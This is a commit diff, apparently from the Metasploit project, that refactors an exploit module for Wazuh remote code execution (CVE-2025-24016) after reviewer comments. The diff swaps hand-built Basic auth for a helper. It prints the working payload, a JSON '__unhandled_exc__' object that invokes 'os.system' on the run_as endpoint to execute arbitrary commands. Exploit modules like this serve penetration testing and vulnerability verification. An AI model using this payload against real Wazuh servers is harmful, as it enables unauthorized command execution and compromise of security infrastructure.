update based on adfoster-r7 comments

Author: h00die-gr3y

modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb

@@ -70,13 +70,11 @@ def initialize(info = {})
   # get Wazuh API token
   # return token if API login is successful else nil
   def get_api_token
-    auth = Base64.strict_encode64("#{datastore['API_USER']}:#{datastore['API_PWD']}")
-    basic_auth = "Basic #{auth}"
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'security', 'user', 'authenticate'),
       'headers' => {
-        'Authorization' => basic_auth.to_s
+        'Authorization' => basic_auth(datastore['API_USER'], datastore['API_PWD'])
       }
     })
     return unless res&.code == 200 && res.body.include?('token')
@@ -106,21 +104,18 @@ def get_wazuh_version(api_token)
   def execute_command(cmd, _opts = {})
     # {"__unhandled_exc__":{"__class__": "os.system", "__args__": ["cmd"]}}
     post_data = {
-      __unhandled_exc__:
-      {
+      __unhandled_exc__: {
         __class__: 'os.system',
         __args__: [ cmd.to_s ]
       }
     }.to_json
 
-    auth = Base64.strict_encode64("#{datastore['API_USER']}:#{datastore['API_PWD']}")
-    basic_auth = "Basic #{auth}"
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'security', 'user', 'authenticate', 'run_as'),
       'ctype' => 'application/json',
       'headers' => {
-        'Authorization' => basic_auth.to_s
+        'Authorization' => basic_auth(datastore['API_USER'], datastore['API_PWD'])
       },
       'data' => post_data.to_s
     })